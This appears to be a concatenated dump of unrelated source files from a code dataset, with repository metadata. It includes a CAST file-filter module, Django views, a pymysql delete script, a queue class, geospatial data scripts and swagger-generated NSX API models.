xmlFile = urllib.request.urlopen('https://www.youtube.com/feeds/videos.xml?channel_id=' + sys.argv[1])
Parser.parse(xmlFile)
page = PAGE.format(videos=videos)
print(page)
except URLError:
print("Introduce a valid channel Id")
|
[
"c.borao.2017@alumnos.urjc.es"
] |
c.borao.2017@alumnos.urjc.es
|
40c19d84fb25f6fed0b4af8ac7f99c567eff0950
|
0d86664dd973242fdf895e515fe8df5847c03980
|
/analyze/extensions/com.castsoftware.html5.2.0.8-funcrel/js_file_filters.py
|
977bcb983f010c69e2264b2241d0ef05da06bb99
|
[
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-public-domain"
] |
permissive
|
neel7h/engineering
|
2de1ed914be924aabf7d3133c28efd250fc08e13
|
4afd87d1700a34d662453860526aef5ba1201268
|
refs/heads/master
| 2022-02-18T06:32:43.532951
| 2019-10-03T08:41:39
| 2019-10-03T08:41:39
| 212,519,749
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,701
|
py
|
'''
Created on 26 nov. 2014
@author: iboillon
'''
import os
import json
import re
import cast.analysers
from cast.application import open_source_file # @UnresolvedImport
import traceback
class FileFilter:
def __init__(self):
jsonPath = os.path.abspath(os.path.join(os.path.dirname(__file__), 'filters.json'))
self.filters = json.loads(open_source_file(jsonPath).read())
self.last_matches_result = None
def get_last_result(self):
return self.last_matches_result if self.last_matches_result else ''
def matches(self, filename, css = False):
self.last_matches_result = None
fname = filename.replace(os.sep, '/')
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'FilePath' ]:
pattern = _filter['value'].upper()
if css and pattern.endswith(".JS"):
pattern = pattern[0:-3] + '.CSS'
if self.match_string(pattern, fname.upper()):
self.last_matches_result = 'filepath matches pattern ' + pattern
return True
if filename.endswith('.cshtml.html'): # we skip .cshtml.html files because they are generated from .cshtml files
cshtmlFilepath = filename[:-5]
if os.path.isfile(cshtmlFilepath):
self.last_matches_result = 'generated from .cshtml file'
return True
return False
# matches a pattern token containing one or several stars with a string
# A pattern token does not contain /.
# Example: **/*toto*/** contains 3 pattern tokens: **, *toto* and **
def matches_token_with_star(self, patternToken, fnameToken):
vals = patternToken.split('*')
valsFound = []
oneValueNotFound = False
l = len(vals)
cmpt = 0
for val in vals:
if val:
if cmpt == 0:
if not fnameToken.startswith(val):
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
elif cmpt == l-1:
if not fnameToken.endswith(val):
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
else:
if not val in fnameToken:
valsFound.append(False)
oneValueNotFound = True
else:
valsFound.append(True)
else:
valsFound.append(True)
cmpt += 1
if not oneValueNotFound:
# check that there are no / between matches
i = 0
ok = True
while i < l-1:
middle = fnameToken[len(vals[i]):len(fnameToken)-len(vals[i+1])]
if '/' in middle:
ok = False
i += 1
if ok:
return True
return False
# matches a pattern corresponding to a file path with a string
# Example: **/*toto*/**
def match_string(self, pattern, fname):
patternTokens = pattern.split('/')
fnameTokens = fname.split('/')
cmptFname = len(fnameTokens) - 1
doubleStarJustPassed = False
for patternToken in reversed(patternTokens):
if patternToken == '**':
doubleStarJustPassed = True
continue
starPresent = False
if '*' in patternToken:
starPresent = True
if doubleStarJustPassed:
ok = False
while cmptFname >= 0:
fnameToken = fnameTokens[cmptFname]
cmptFname -= 1
if not starPresent:
if fnameToken == patternToken:
ok = True
break
else:
if self.matches_token_with_star(patternToken, fnameToken):
ok = True
break
if not ok and cmptFname < 0:
return False
else:
fnameToken = fnameTokens[cmptFname]
if not starPresent:
if not fnameToken == patternToken:
return False
else:
if not self.matches_token_with_star(patternToken, fnameToken):
return False
cmptFname -= 1
doubleStarJustPassed = False
if cmptFname >= 0 and patternTokens[0] != '**':
return False
return True
class JSFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nbLongLines = 0
maxLine = 0
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'FileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
cast.analysers.log.debug('Internal issue when filtering file: ' + str(filename) + ' line ' + str(nLine))
cast.analysers.log.debug(str(traceback.format_exc()))
nLine += 1
l = len(line)
if l > 400:
nbLongLines += 1
if l > maxLine:
maxLine = l
except:
cast.analysers.log.debug('Internal issue when filtering file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
# we check is the file can be a minified file
if nLine == 0 or nbLongLines / nLine > 0.5 or (nbLongLines / nLine > 0.2 and maxLine > 10000):
self.last_matches_result = 'minified file'
return True
return False
def matches(self, filename):
if FileFilter.matches(self, filename):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
return False
class CssFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'CssFileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
pass
else:
break
except:
cast.analysers.log.debug('Internal issue when reading file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
return False
def matches(self, filename):
if FileFilter.matches(self, filename, True):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
return False
class HtmlFileFilter(FileFilter):
def __init__(self):
FileFilter.__init__(self)
def match_file(self, filename, bUTF8):
nLine = 0
try:
with open_source_file(filename) as f:
for line in f:
if nLine <= 15:
for _filter in [ _filter for _filter in self.filters if _filter['type'] == 'HtmlFileContent' ]:
try:
if re.search(_filter['value'], line):
self.last_matches_result = 'pattern found in file : ' + _filter['value']
return True
except:
pass
else:
break
except:
cast.analysers.log.debug('Internal issue when reading file: ' + str(filename))
cast.analysers.log.debug(str(traceback.format_exc()))
return False
def matches(self, filename):
if FileFilter.matches(self, filename):
return True
try:
return self.match_file(filename, True)
except UnicodeDecodeError:
return self.match_file(filename, False)
return False
|
[
"a.kumar3@castsoftware.com"
] |
a.kumar3@castsoftware.com
|
41cc8cb8ec10ccb8c7eb432e8f3cc4602df5f651
|
d043a51ff0ca2f9fb3943c3f0ea21c61055358e9
|
/python3网络爬虫开发实战/数据存储/MySQL实验/删除数据2.py
|
7af2d45b23cc102f658c4407ee7362981f7f0c80
|
[] |
no_license
|
lj1064201288/dell_python
|
2f7fd9dbcd91174d66a2107c7b7f7a47dff4a4d5
|
529985e0e04b9bde2c9e0873ea7593e338b0a295
|
refs/heads/master
| 2020-03-30T03:51:51.263975
| 2018-12-11T13:21:13
| 2018-12-11T13:21:13
| 150,707,725
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
import pymysql
db = pymysql.connect(host="localhost", user='root', password='123456', port=3306, db='django')
cursor = db.cursor()
table = "friends"
age = "age > 30"
sql = 'DELETE FROM {table} WHERE {age}'.format(table=table, age=age)
try:
cursor.execute(sql)
print("Successful...")
db.commit()
except:
print("Failed...")
db.rollback()
finally:
db.close()
|
[
"1064201288@qq.com"
] |
1064201288@qq.com
|
181a7dc33b61cdc418e9314d9e6ba8faa6a0d378
|
0d7d344edf0dc4b905b12a96a004a773191aa26f
|
/visas/admin.py
|
b00da55229665e711a24d095008554baee723958
|
[] |
no_license
|
BoughezalaMohamedAimen/Amine
|
ae615ca64c5d0c8977e26aee2906e606439250d5
|
6060d48ab1308c217fe1bd8bd419369f83cb733a
|
refs/heads/master
| 2020-06-27T11:57:30.682966
| 2019-08-04T22:56:41
| 2019-08-04T22:56:41
| 199,948,247
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Visa)
|
[
"mamoumou121@gmail.com"
] |
mamoumou121@gmail.com
|
2d3d1b442af9336be133c309201d7efd2fff5c15
|
19692e21e740eca07b493cf4ebf22ad833ce827d
|
/lawsite_nogit/lawsite/wsgi.py
|
11149264db289cadfe32f7a73806afab1794e05b
|
[] |
no_license
|
reedharder/bending_the_law
|
6033082d78175285983e98dc8cda0c9da72b97b2
|
bd85f6a3f91c3f9bb28da87177a5578a7fffb9c6
|
refs/heads/master
| 2020-04-09T11:55:49.036953
| 2016-08-05T15:58:47
| 2016-08-05T15:58:47
| 40,094,227
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 565
|
py
|
"""
WSGI config for lawsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lawsite.settings")
application = get_wsgi_application()
'''
from whitenoise.django import DjangoWhiteNoise
from dj_static import Cling
application = Cling(get_wsgi_application())
application = DjangoWhiteNoise(application)
'''
|
[
"reedharder@gmail.com"
] |
reedharder@gmail.com
|
3a2925faeb0eaad7e3a73932dba72170f81fdccb
|
26629871a6c7eaa82dcf1d7f1adf8cae2ab24991
|
/DressitUp/Home/views.py
|
fccfbe31e43ed74692670d210e631723d6a742cb
|
[] |
no_license
|
RonakNandanwar26/DressitUp
|
2421fb62ad5e47be36f66dc3920cafe49ee43eb9
|
4e7ac01a9411ad2b767efb2a80ad5dc6344449ab
|
refs/heads/master
| 2022-11-30T23:14:38.989536
| 2020-07-11T12:17:08
| 2020-07-11T12:17:08
| 278,849,777
| 0
| 0
| null | 2022-11-18T10:56:10
| 2020-07-11T11:39:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,563
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from .forms import ContactForm, ProfileForm, UserForm
from django.contrib import messages
from django.core.mail import send_mail
from DressitUp import settings
from products.forms import ProductForm
# Create your views here.
def home(request):
template = 'Home/index.html'
return render(request, template, {})
def list(request):
template = 'Home/list.html'
return render(request, template, {})
def about(request):
template = 'Home/about.html'
return render(request, template, {})
def shop(request):
template = 'Home/shop.html'
return render(request, template, {})
def contact(request):
if request.method == "POST":
form = ContactForm(request.POST or None)
if form.is_valid():
contact_name = form.cleaned_data['name']
contact_email = form.cleaned_data['email']
sub = form.cleaned_data['subject']
content = form.cleaned_data['message']
print(contact_name)
form.save()
subject = 'Hello ' + contact_name + ' from DressitUp!'
message = 'Stay Connected. We would love to hear you!'
email_from = settings.EMAIL_HOST_USER
email_to = [contact_email, ]
send_mail(subject, message, email_from, email_to)
messages.success(request, 'Form submitted successfully.')
return redirect('Home:home')
else:
messages.error(request, 'Please correct the error below.')
else:
form = ContactForm()
template = 'Home/contact.html'
return render(request, template, {'form': form})
def profile(request):
template = 'Home/profile.html'
if request.method == 'POST':
user_form = UserForm(request.POST or None, request.FILES or None, instance=request.user)
profile_form = ProfileForm(request.POST or None, request.FILES or None, instance=request.user.profile)
if user_form.is_valid() and profile_form.is_valid():
user_form.save()
profile_form.save()
messages.success(request, "Your Profile is Updated Successfully..")
return redirect('Home:home')
else:
messages.error(request, 'Please Correct the error below')
else:
user_form = UserForm(instance=request.user)
profile_form = ProfileForm(instance=request.user.profile)
return render(request, template, {'user_form': user_form,
'profile_form': profile_form})
|
[
"ronaknandanwar1999@gmail.com"
] |
ronaknandanwar1999@gmail.com
|
c47eb54349cc1aaf6624d4dd8dda17bbcb9f3a10
|
e1c4b32f23d8622be21db1445c9877f0de1680f1
|
/backend/app/controllers/home.py
|
c6b483330ecfcd0750b79fd1d46b35e43bca8be4
|
[] |
no_license
|
AngCosmin/api-flask
|
8d212f0393b9a7590eeafd1b704f1a2b51bfe0a3
|
7c09d78cda9160b60a162ac15761ad5817c17917
|
refs/heads/master
| 2022-12-15T04:36:43.692837
| 2019-04-05T20:30:15
| 2019-04-05T20:30:15
| 179,749,615
| 0
| 0
| null | 2022-09-16T17:58:57
| 2019-04-05T20:24:59
|
Python
|
UTF-8
|
Python
| false
| false
| 133
|
py
|
from flask import Blueprint
blueprint = Blueprint('home', __name__)
@blueprint.route('/')
def index():
return 'Hello World'
|
[
"cosminzorr@gmail.com"
] |
cosminzorr@gmail.com
|
21f4eac2a5d60a2dfe080bd75652381d18460ec0
|
d37189d84ee0fe11969fb4b591899035a5533352
|
/fun2.py
|
1e86b8658e999401565ccd3b3f43d478390d1109
|
[] |
no_license
|
KebadSew/scratch_python
|
5654e1fe2e13f88b630b26ace21e96bac3278da2
|
aa460807200a6eb3b64ba17549769c4b0d023572
|
refs/heads/master
| 2023-02-16T15:34:42.924669
| 2021-01-19T00:58:07
| 2021-01-19T00:58:07
| 293,111,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 570
|
py
|
# create a function which prints sum of two input number parameters
'''
def sum(x,y):
print("Sum is ",x+y)
sum(5, 7)
# subtract
def mekenes(x,y):
print("Mekenes of x-y is ",x-y)
mekenes(5, 7)
'''
def sum(x, y, z):
return x+y+z
s = sum(8, 6, 2)
# create a function which prints sum of two input number parameters
'''
def sum(x,y):
print("Sum is ",x+y)
sum(5, 7)
# subtract
def mekenes(x,y):
print("Mekenes of x-y is ",x-y)
mekenes(5, 7)
'''
def sum(x, y, z):
return x+y+z
s = sum(8, 6, 2)
print("The sum of 8+6+2 is ", s)
|
[
"lingering.quest@gmail.com"
] |
lingering.quest@gmail.com
|
3b5eb65cc24ada0602641c43bd8365025a109f61
|
43bd7dce16d5dd856d9755ee44b89316ab4dcfbd
|
/BakeryManagement/asgi.py
|
7aa89e87c3a4ee6687a9cd753db29c46f5d449c9
|
[] |
no_license
|
rishabh-22/BakeryManagement
|
86bc0e478ed954c46e734afc0ee2f9261d46b2a7
|
0b75306f1db2f42e047d1e65a1baeaf62c29919e
|
refs/heads/master
| 2023-03-26T01:24:18.087439
| 2021-03-11T19:43:35
| 2021-03-11T19:43:35
| 344,091,099
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
ASGI config for BakeryManagement project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'BakeryManagement.settings')
application = get_asgi_application()
|
[
"rishabh.bh22@gmail.com"
] |
rishabh.bh22@gmail.com
|
f2ebf591f742eb1433a9072d3c9826170e1cb8cd
|
2f73a3d4daac2aa2c38c3443b4f5555c49faa1c8
|
/Data.py
|
d8e917bf4fa96358299cdd241123799362a03919
|
[] |
no_license
|
18021009/project
|
656b6c8f9a0120c1185493d04405660895db93e9
|
0133f412e50e3dadd13bd0028832babf846070e5
|
refs/heads/main
| 2023-05-07T17:08:41.529766
| 2021-06-01T04:06:38
| 2021-06-01T04:06:38
| 372,696,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,718
|
py
|
from math import nan
from os import name
from Station import station
import numpy as np
import datetime
import pandas as pd
from Map import map
from Point import point
# standardline date data.csv to college.csv
# ds = pd.read_csv('data.csv')
def changeToDate(output_file):
ds = pd.read_csv('data.csv')
day_delta = datetime.timedelta(days=1)
start_date = datetime.date(2019, 1, 1)
end_date = datetime.date(2020, 1, 1)
for i in range((end_date - start_date).days):
day = start_date + i*day_delta
_day = day.strftime('X%m/X%d/%Y').replace('X0','X').replace('X','')
ds['time'] = ds['time'].replace({_day: day})
ds.to_csv(output_file, index=False)
def buffer_data(input_file, buffer):
dataStation = pd.read_csv(input_file)
dataStation['wind_speed'] = nan
dataStation['temperature'] = nan
dataStation['satellite_NO2'] = nan
dataStation["road_density"] = nan
dataStation["relative_humidity"] = nan
dataStation["pressure"] = nan
dataStation["population_density"] = nan
dataStation["pblh"] = nan
dataStation["NDVI"] = nan
dataStation["dpt"] = nan
dataStationArray = dataStation.values
dataStation = pd.DataFrame(dataStationArray, columns=['time', 'lat', 'long', 'NO2', 'name', 'wind_speed' + str(buffer), 'temperature' + str(buffer), 'satellite_NO2' + str(buffer), 'road_density' + str(buffer), 'relative_humidity' + str(buffer), 'pressure' + str(buffer), 'population_density' + str(buffer), 'pblh' + str(buffer), 'NDVI' + str(buffer), 'dpt' + str(buffer)])
dataStation.to_csv(input_file, float_format='{:f}'.format, index=False)
changeToDate('buffer_1_data.csv')
buffer_data('buffer_1_data.csv', 1)
changeToDate('buffer_2_data.csv')
buffer_data('buffer_2_data.csv', 2)
changeToDate('buffer_3_data.csv')
buffer_data('buffer_3_data.csv', 3)
# a = pd.read_csv("buffer_1_data.csv")
# b = pd.read_csv("buffer_2_data.csv")
# merged = a.merge(b, on=['time', 'lat', 'long', 'name'], how='inner')
# merged.to_csv('merge.csv', index=False)
# c = pd.read_csv("merge.csv")
# d = pd.read_csv("buffer_3_data.csv")
# merged = c.merge(d, on=['time', 'lat', 'long', 'name'], how='inner')
# merged.to_csv('merge.csv', index=False)
# buffer_radius
# _buffer_radius = 1
# dataStation = pd.read_csv('college.csv')
# dataStation['wind_speed'] = -999.0
# dataStation["road_dens"] = -999.0
# dataStation["pp_dens"] = -999.0
# dataStation["earth_no2"] = -999.0
# dataStationArray = dataStation.values
# # add wind speed to dataStationArray
# start_date = datetime.date(2019, 1, 1)
# end_date = datetime.date(2020, 1, 1)
# day_delta = datetime.timedelta(days=1)
# for i in range((end_date - start_date).days):
# fileName = "WSPDCombine_"
# day = start_date + i*day_delta
# file = "map/wind_speed/" + fileName + day.strftime('%Y%m%d') + ".tif"
# _map = map()
# _map.setMap(file)
# for data in dataStationArray:
# if((data[0] == day.strftime('%Y-%m-%d'))):
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[5] = np.float64(_station.bufferValue)
# # add road to college.csv
# _map = map()
# _map.setMap('map/road_density/road_dens.tif')
# for data in dataStationArray:
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[6] = _station.bufferValue
# # add population_density
# _map = map()
# _map.setMap('map/population_density/ppd.tif')
# for data in dataStationArray:
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[7] = _station.bufferValue
# # add earth_no2
# for i in range((end_date - start_date).days):
# fileName = "NO2_"
# day = start_date + i*day_delta
# file = "map/NO2/" + fileName + day.strftime('%Y%m%d') + ".tif"
# _map = map()
# _map.setMap(file)
# for data in dataStationArray:
# if((data[0] == day.strftime('%Y-%m-%d'))):
# _point = point(data[2], data[1])
# _point.set_position_on_matrix(_map)
# _station = station(_point, _buffer_radius)
# _station.setBufferValue(_map)
# data[8] = _station.bufferValue
# newDataStation = pd.DataFrame(dataStationArray, columns=['time', 'lat', 'long', 'NO2', 'name', 'wind_speed', 'road_dens', 'pp_dens', 'earth_no2'])
# newDataStation.to_csv('college_2.csv', float_format='{:f}'.format, index=False)
|
[
"myEmail@example.com"
] |
myEmail@example.com
|
1ce65bae1f1abca5f6f1b6dcf3dd5b53a58ec9b5
|
a87ed28a5217101f57f387c8003ed73e4bb873d3
|
/cracking-the-code-interview/queue.py
|
deb62c3fb3c1dda57e89705ad3572c070f678842
|
[] |
no_license
|
snahor/chicharron
|
82f65836258462a900f2dba6b4192a436e16e7d0
|
710e7114d8768965cd50556cbbeeed0e3604cf92
|
refs/heads/master
| 2021-01-24T14:11:32.235253
| 2017-07-19T06:06:42
| 2017-07-19T06:06:42
| 41,190,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,003
|
py
|
from linked_list import Node
class Queue:
'''
>>> q = Queue()
>>> q.enqueue(1)
>>> q.enqueue(2)
>>> q.enqueue(3)
>>> q.dequeue()
1
>>> q.dequeue()
2
>>> q.enqueue(4)
>>> q.enqueue(5)
>>> q.dequeue()
3
>>> q.dequeue()
4
>>> q.dequeue()
5
>>> q.dequeue()
'''
def __init__(self):
self.head = None
self.last = None
def enqueue(self, value):
node = Node(value)
if not self.head:
self.head = node
self.last = node
else:
self.last.next = node
self.last = node
def dequeue(self):
if not self.head:
return None
node = self.head
self.head = node.next
if self.last == node:
self.last = node.next
return node.value
def is_empty(self):
return self.head is None
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
[
"hans.r.69@gmail.com"
] |
hans.r.69@gmail.com
|
30295c60432b3dc86a5982db72a44530415d66b1
|
893577de9978f7868e7a3608ab697a320adf55f1
|
/python/Day1/problem1_3.py
|
9c71c686b36cf77b1e2c9ff80693415d699a73b8
|
[] |
no_license
|
zealfory/xiyu-NLPTrainee
|
0d8c6ab80cfc7b3a00e886f340f34e5ed4650fc2
|
3e63bad5d53b478563003d0c78fa1cab63fcefb4
|
refs/heads/master
| 2020-06-13T15:24:30.589485
| 2019-08-26T08:15:22
| 2019-08-26T08:15:22
| 194,693,706
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
def longestValidParentheses(s):
"""
:para s: str -- 字符串
:return: int -- 最长有效括号串长度
"""
s_length = len(s)
stack = []
start = 0
maxlen = 0
for i in range(s_length):
# 左括号入栈
if s[i] == '(':
stack.append(i)
# 右括号
else:
# 栈空则更改起始点
if len(stack) == 0:
start = i + 1
continue
# 栈非空则出栈
else:
a = stack.pop()
# 更新最大长度值
if len(stack) == 0:
maxlen = max(i - start + 1, maxlen)
else:
maxlen = max(i-stack[-1], maxlen)
return maxlen
# test
def main():
print(longestValidParentheses("(()"))
print(longestValidParentheses(")()())"))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
b749d4bcecade6a4c865a8f3a69ebd30954dfe41
|
f09dc121f213f2881df3572288b7ee5b39246d73
|
/aliyun-python-sdk-config/aliyunsdkconfig/request/v20190108/GetSupportedResourceTypesRequest.py
|
8fb02d120fe982b0df0cc395179ce63061909e27
|
[
"Apache-2.0"
] |
permissive
|
hetw/aliyun-openapi-python-sdk
|
2f31378ad6be0896fb8090423f607e9c7d3ae774
|
7443eacee9fbbaa93c7975c6dbec92d3c364c577
|
refs/heads/master
| 2023-01-19T22:42:36.214770
| 2020-12-04T10:55:14
| 2020-12-04T10:55:14
| 318,689,093
| 1
| 0
|
NOASSERTION
| 2020-12-05T03:03:03
| 2020-12-05T03:03:03
| null |
UTF-8
|
Python
| false
| false
| 1,296
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkconfig.endpoint import endpoint_data
class GetSupportedResourceTypesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Config', '2019-01-08', 'GetSupportedResourceTypes','Config')
self.set_method('GET')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
a6b9a81031ca5ebba259e3bfd9015c0ce85b1d1f
|
3e0abf5d310edec9ac8cd939b83518d5f1cb753c
|
/feature-a.py
|
e0ef5294caaa47e7af55eaf6dd68035d8175d3a2
|
[] |
no_license
|
anushkhasingh30/git-1
|
ebc13f9974bee04650e7a6aa0e8313d1ebe5eaac
|
4516ce4a2ac811246c50a7b8012ff4a028959695
|
refs/heads/master
| 2023-06-25T00:04:15.593702
| 2021-07-27T10:38:00
| 2021-07-27T10:38:00
| 389,939,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19
|
py
|
print('feature a ')
|
[
"anushkhasingh30@gmail.com"
] |
anushkhasingh30@gmail.com
|
46cda83c4132a39c6286332ab4240e378fc2e4e7
|
e4ab9d29abcadd76e4f540d3ea5487aff4259004
|
/lab_7.1.py
|
0255a13ca5b7f91bd5fb38e43f948cf43ecf9a42
|
[] |
no_license
|
swyatik/python-KPI
|
83332ed2fa3a49acd6c521416a08c005f4be78d2
|
10adac7d76790256ebe72339455a0a081433d4f6
|
refs/heads/master
| 2020-06-04T22:27:10.463697
| 2019-06-16T16:52:02
| 2019-06-16T16:52:02
| 192,215,205
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,796
|
py
|
class Sphere(object):
def __init__(self, radius = 1.0, x = 0.0, y = 0.0, z = 0.0):
self.radius = float(radius)
self.x = float(x)
self.y = float(y)
self.z = float(z)
def get_volume(self):
v = 4 / 3 * 3.1415926535897932384626433 * self.radius ** 3
return v
def get_square(self):
s = 4 * 3.1415926535897932384626433 * (self.radius ** 2)
return s
def get_radius(self):
return self.radius
def get_center(self):
return (self.x, self.y, self.z,)
def set_radius(self, r):
self.r = float(r)
self.radius = r
def set_center(self, x_new, y_new, z_new):
self.x = float(x_new)
self.y = float(y_new)
self.z = float(z_new)
def is_point_inside(self, x_1, y_1, z_1):
self.x_1 = x_1
self.y_1 = y_1
self.z_1 = z_1
rn = ((self.x_1 - self.x) ** 2 + (self.y_1 - self.y) ** 2 + (self.z_1 - self.z) ** 2) ** 0.5
if rn > self.radius:
return False
else:
return True
s1 = Sphere()
print(s1.radius, s1.x, s1.y, s1.z)
print('V1 =', s1.get_volume())
print('S1 =', s1.get_square())
print('R =', s1.get_radius())
print('coordinates = ', s1.get_center())
s1.set_radius(5)
print('R= %s' % (s1.get_radius()))
s1.set_center(1025, 1026, 1027)
print('coordinates=', s1.get_center())
print(s1.is_point_inside(1000, 1000, 1000), '\n')
s0 = Sphere(0.5) # test sphere creation with radius and default center
print(s0.get_center()) # (0.0, 0.0, 0.0)
print(s0.get_volume()) # 0.523598775598
print(s0.is_point_inside(0, -1.5, 0)) # False
s0.set_radius(1.6)
print(s0.is_point_inside(0, -1.5, 0)) # True
print(s0.get_radius()) # 1.6
|
[
"noreply@github.com"
] |
noreply@github.com
|
6fe04aaf0e701031982130a0f867b59e8d83e3ec
|
42d18b5dba342099dae032ab2aa2bb19b995f9be
|
/ch/ch1/wxpy/helper/sendHelper.py
|
836277903d0cc0bfb05cfdad56a0430e3bb0d0a0
|
[] |
no_license
|
wenyaodong777/python-workshop
|
4e38ee7f3c96e8cdac3804c980b735db304ffb18
|
5f7bb9aa227ec46c89f793f592f3c90e9cd50603
|
refs/heads/master
| 2020-05-26T18:14:58.354116
| 2019-05-24T00:52:32
| 2019-05-24T00:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
class WXSender():
def send(self, groups, content):
for group in groups:
group.send(content)
|
[
"wuchenbao@odc.cmbchina.cn"
] |
wuchenbao@odc.cmbchina.cn
|
f9de853a23a36e10aefcbfd18bf0dfcea6055cfa
|
19d47d47c9614dddcf2f8d744d883a90ade0ce82
|
/pynsxt/swagger_client/models/ns_service_group_list_result.py
|
bbaee722d7f2d1956d8eea75ec65fa8637b79b2e
|
[] |
no_license
|
darshanhuang1/pynsxt-1
|
9ed7c0da9b3a64e837a26cbbd8b228e811cee823
|
fb1091dff1af7f8b8f01aec715682dea60765eb8
|
refs/heads/master
| 2020-05-25T14:51:09.932853
| 2018-05-16T12:43:48
| 2018-05-16T12:43:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,282
|
py
|
# coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.list_result import ListResult # noqa: F401,E501
from swagger_client.models.ns_service_group import NSServiceGroup # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
class NSServiceGroupListResult(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'_self': 'SelfResourceLink',
'links': 'list[ResourceLink]',
'schema': 'str',
'cursor': 'str',
'sort_ascending': 'bool',
'sort_by': 'str',
'result_count': 'int',
'results': 'list[NSServiceGroup]'
}
attribute_map = {
'_self': '_self',
'links': '_links',
'schema': '_schema',
'cursor': 'cursor',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'result_count': 'result_count',
'results': 'results'
}
def __init__(self, _self=None, links=None, schema=None, cursor=None, sort_ascending=None, sort_by=None, result_count=None, results=None): # noqa: E501
"""NSServiceGroupListResult - a model defined in Swagger""" # noqa: E501
self.__self = None
self._links = None
self._schema = None
self._cursor = None
self._sort_ascending = None
self._sort_by = None
self._result_count = None
self._results = None
self.discriminator = None
if _self is not None:
self._self = _self
if links is not None:
self.links = links
if schema is not None:
self.schema = schema
if cursor is not None:
self.cursor = cursor
if sort_ascending is not None:
self.sort_ascending = sort_ascending
if sort_by is not None:
self.sort_by = sort_by
if result_count is not None:
self.result_count = result_count
self.results = results
@property
def _self(self):
"""Gets the _self of this NSServiceGroupListResult. # noqa: E501
